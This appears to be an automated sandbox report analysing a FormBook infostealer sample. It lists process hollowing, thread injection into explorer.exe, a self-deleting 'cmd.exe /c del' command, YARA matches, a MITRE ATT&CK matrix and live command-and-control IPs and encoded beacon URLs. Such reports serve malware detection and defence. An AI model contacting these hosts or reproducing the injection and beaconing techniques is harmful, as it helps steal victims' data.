Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD8A0A mov eax, dword ptr fs:[00000030h]	9_2_04AD8A0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACC600 mov eax, dword ptr fs:[00000030h]	9_2_04ACC600
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACC600 mov eax, dword ptr fs:[00000030h]	9_2_04ACC600
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACC600 mov eax, dword ptr fs:[00000030h]	9_2_04ACC600
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF8E00 mov eax, dword ptr fs:[00000030h]	9_2_04AF8E00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE3A1C mov eax, dword ptr fs:[00000030h]	9_2_04AE3A1C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFA61C mov eax, dword ptr fs:[00000030h]	9_2_04AFA61C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFA61C mov eax, dword ptr fs:[00000030h]	9_2_04AFA61C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACAA16 mov eax, dword ptr fs:[00000030h]	9_2_04ACAA16
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACAA16 mov eax, dword ptr fs:[00000030h]	9_2_04ACAA16
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD766D mov eax, dword ptr fs:[00000030h]	9_2_04AD766D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B0927A mov eax, dword ptr fs:[00000030h]	9_2_04B0927A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B7B260 mov eax, dword ptr fs:[00000030h]	9_2_04B7B260
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B7B260 mov eax, dword ptr fs:[00000030h]	9_2_04B7B260
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B98A62 mov eax, dword ptr fs:[00000030h]	9_2_04B98A62
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	9_2_04AEAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	9_2_04AEAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	9_2_04AEAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	9_2_04AEAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	9_2_04AEAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B54257 mov eax, dword ptr fs:[00000030h]	9_2_04B54257
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]	9_2_04AC9240
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]	9_2_04AC9240
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]	9_2_04AC9240
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]	9_2_04AC9240
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	9_2_04AD7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	9_2_04AD7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	9_2_04AD7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	9_2_04AD7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	9_2_04AD7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	9_2_04AD7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B95BA5 mov eax, dword ptr fs:[00000030h]	9_2_04B95BA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B47794 mov eax, dword ptr fs:[00000030h]	9_2_04B47794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B47794 mov eax, dword ptr fs:[00000030h]	9_2_04B47794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B47794 mov eax, dword ptr fs:[00000030h]	9_2_04B47794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD1B8F mov eax, dword ptr fs:[00000030h]	9_2_04AD1B8F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD1B8F mov eax, dword ptr fs:[00000030h]	9_2_04AD1B8F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B8138A mov eax, dword ptr fs:[00000030h]	9_2_04B8138A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B7D380 mov ecx, dword ptr fs:[00000030h]	9_2_04B7D380
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD8794 mov eax, dword ptr fs:[00000030h]	9_2_04AD8794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFB390 mov eax, dword ptr fs:[00000030h]	9_2_04AFB390
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B037F5 mov eax, dword ptr fs:[00000030h]	9_2_04B037F5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	9_2_04AF03E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	9_2_04AF03E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	9_2_04AF03E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	9_2_04AF03E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	9_2_04AF03E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	9_2_04AF03E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B453CA mov eax, dword ptr fs:[00000030h]	9_2_04B453CA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B453CA mov eax, dword ptr fs:[00000030h]	9_2_04B453CA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC4F2E mov eax, dword ptr fs:[00000030h]	9_2_04AC4F2E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC4F2E mov eax, dword ptr fs:[00000030h]	9_2_04AC4F2E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFE730 mov eax, dword ptr fs:[00000030h]	9_2_04AFE730
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFA70E mov eax, dword ptr fs:[00000030h]	9_2_04AFA70E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFA70E mov eax, dword ptr fs:[00000030h]	9_2_04AFA70E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B8131B mov eax, dword ptr fs:[00000030h]	9_2_04B8131B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5FF10 mov eax, dword ptr fs:[00000030h]	9_2_04B5FF10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5FF10 mov eax, dword ptr fs:[00000030h]	9_2_04B5FF10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B9070D mov eax, dword ptr fs:[00000030h]	9_2_04B9070D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B9070D mov eax, dword ptr fs:[00000030h]	9_2_04B9070D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEF716 mov eax, dword ptr fs:[00000030h]	9_2_04AEF716
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]	9_2_04ACDB60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADFF60 mov eax, dword ptr fs:[00000030h]	9_2_04ADFF60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B98F6A mov eax, dword ptr fs:[00000030h]	9_2_04B98F6A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF3B7A mov eax, dword ptr fs:[00000030h]	9_2_04AF3B7A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF3B7A mov eax, dword ptr fs:[00000030h]	9_2_04AF3B7A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B98B58 mov eax, dword ptr fs:[00000030h]	9_2_04B98B58
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACDB40 mov eax, dword ptr fs:[00000030h]	9_2_04ACDB40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADEF40 mov eax, dword ptr fs:[00000030h]	9_2_04ADEF40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACF358 mov eax, dword ptr fs:[00000030h]	9_2_04ACF358

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 23.253.73.122 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.213.108.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.27 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.224.206.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.223.115.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.76.239 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 92.249.45.191 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Section loaded: unknown target: C:\Users\user\Desktop\lpdKSOB78u.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 3388	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1330000

Jump to behavior

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Process created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000000.214145154.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.229364456.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

0_2_00403486

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Access Token Manipulation1	Virtualization/Sandbox Evasion3	OS Credential Dumping	Security Software Discovery231	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Process Injection512	Access Token Manipulation1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Process Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing2	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
lpdKSOB78u.exe	44%	Virustotal		Browse
lpdKSOB78u.exe	36%	ReversingLabs	Win32.Trojan.Convagent
lpdKSOB78u.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll	22%	ReversingLabs	Win32.Trojan.Convagent
C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.lpdKSOB78u.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.2.lpdKSOB78u.exe.2a30000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.1.lpdKSOB78u.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.lpdKSOB78u.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
1.2.lpdKSOB78u.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.lpdKSOB78u.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.buildassetswealth.com/4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha	0%	Avira URL Cloud	safe
http://www.inbarrel.com/4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/pics/27587/Left.png)	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.antips.com/4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/27587/Right.png)	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
www.torontotel.com/4qdc/	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)	0%	Avira URL Cloud	safe
http://rdfs.org/sioc/ns#	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.39palmavenue.com/4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha	0%	Avira URL Cloud	safe
http://www.rehabcareconnect.com/4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha	0%	Avira URL Cloud	safe
http://www.ndk168.com/4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha	0%	Avira URL Cloud	safe
http://rdfs.org/sioc/types#	0%	Avira URL Cloud	safe
http://www.pcareinc.com/4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha	0%	Avira URL Cloud	safe
http://www.speedysnacksbox.com/4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.beconfidentagain.com/4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf	0%	Avira URL Cloud	safe
http://www.edgewooddhr.net/4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
speedysnacksbox.com	34.102.136.180	true	true	unknown
www.larek.store	185.104.45.146	true	false	unknown
www.edgewooddhr.net	208.91.197.27	true	true	unknown
rehabcareconnect.com	92.249.45.191	true	true	unknown
sequoia.bostonlogic.com	23.253.73.122	true	false	high
www.beconfidentagain.com	104.21.76.239	true	true	unknown
havemercyinc.net	34.102.136.180	true	true	unknown
inbarrel.com	34.102.136.180	true	true	unknown
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com	3.223.115.185	true	false	high
buildassetswealth.com	34.102.136.180	true	true	unknown
www.pcareinc.com	154.213.108.250	true	true	unknown
www.ndk168.com	23.224.206.45	true	true	unknown
www.havemercyinc.net	unknown	unknown	true	unknown
www.antips.com	unknown	unknown	true	unknown
www.torontotel.com	unknown	unknown	true	unknown
www.39palmavenue.com	unknown	unknown	true	unknown
www.speedysnacksbox.com	unknown	unknown	true	unknown
www.thepixxelgroup.com	unknown	unknown	true	unknown
www.buildassetswealth.com	unknown	unknown	true	unknown
www.inbarrel.com	unknown	unknown	true	unknown
www.rehabcareconnect.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.buildassetswealth.com/4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.inbarrel.com/4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.antips.com/4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha	true	Avira URL Cloud: safe	unknown
www.torontotel.com/4qdc/	true	Avira URL Cloud: safe	low
http://www.39palmavenue.com/4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.rehabcareconnect.com/4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha	true	Avira URL Cloud: safe	unknown
